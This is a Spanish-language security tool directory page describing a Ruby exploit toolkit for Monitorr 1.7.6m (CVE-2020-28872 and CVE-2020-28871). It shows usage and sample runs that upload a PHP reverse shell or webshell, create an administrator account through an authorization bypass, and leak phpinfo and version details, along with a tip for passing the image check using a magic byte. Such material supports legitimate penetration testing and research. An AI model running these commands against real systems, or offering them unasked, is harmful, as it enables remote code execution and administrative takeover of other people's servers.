Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
monitorr-exploit-toolkit — Múltiples exploits para Monitorr | Kitploit
Herramientas/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Múltiples exploits para Monitorr

Ver Repositorio
101hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Kit de exploits para Monitorr

  • RCE mediante carga de archivos no segura (reverse shell PHP, webshell, etc.)
  • Creación de cuenta de administrador mediante bypass de autorización
  • Fuga de información técnica: versión de Monitorr, versión de PHP, versión y kernel del sistema, configuración de PHP, etc.

Exploit para CVE-2020-28872 y CVE-2020-28871.

[PacketStorm]

Uso

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Ejemplos

Subir una reverse shell:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Creación de cuenta de administrador:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Obtener la versión de Monitorr:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

Obtener phpinfp():

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Requisitos

  • httpx
  • docopt.rb

Ejemplo usando gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Despliegue con Docker del software vulnerable

Advertencia: por supuesto, esta configuración no es adecuada para uso en producción.

root@kitploit:~
$ sudo docker-compose up

Configura / inicializa la aplicación en http://127.0.0.1:7000/monitorr/settings.php.

Limitaciones

  • Upload: el archivo subido debe tener un byte mágico de imagen (p. ej., GIF) para que coincida con getimagesize (código)
  • Create: la contraseña utilizada durante la creación de la contraseña debe tener una longitud >= 6 caracteres (límite mínimo de la aplicación)

Referencias

  • Software objetivo: Monitorr
    • Código fuente: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • Versión vulnerable: 1.7.6m

Esta es una reescritura y fusión mejorada de EDB-48981 (CVE-2020-28872) y EDB-48980 (CVE-2020-28871) con funcionalidades adicionales.

Las vulnerabilidades de carga de archivos y creación de cuentas de administrador fueron encontradas por Lyhin's Lab. La fuga de phpinfo y de la versión de Monitorr fue encontrada por Alexandre ZANNI aka noraj.

Análisis del exploit y la vulnerabilidad originales:

  • Cómo funciona el hacking de caja blanca: Bypass de autorización y ejecución remota de código en Monitorr 1.7.6
Descargar herramienta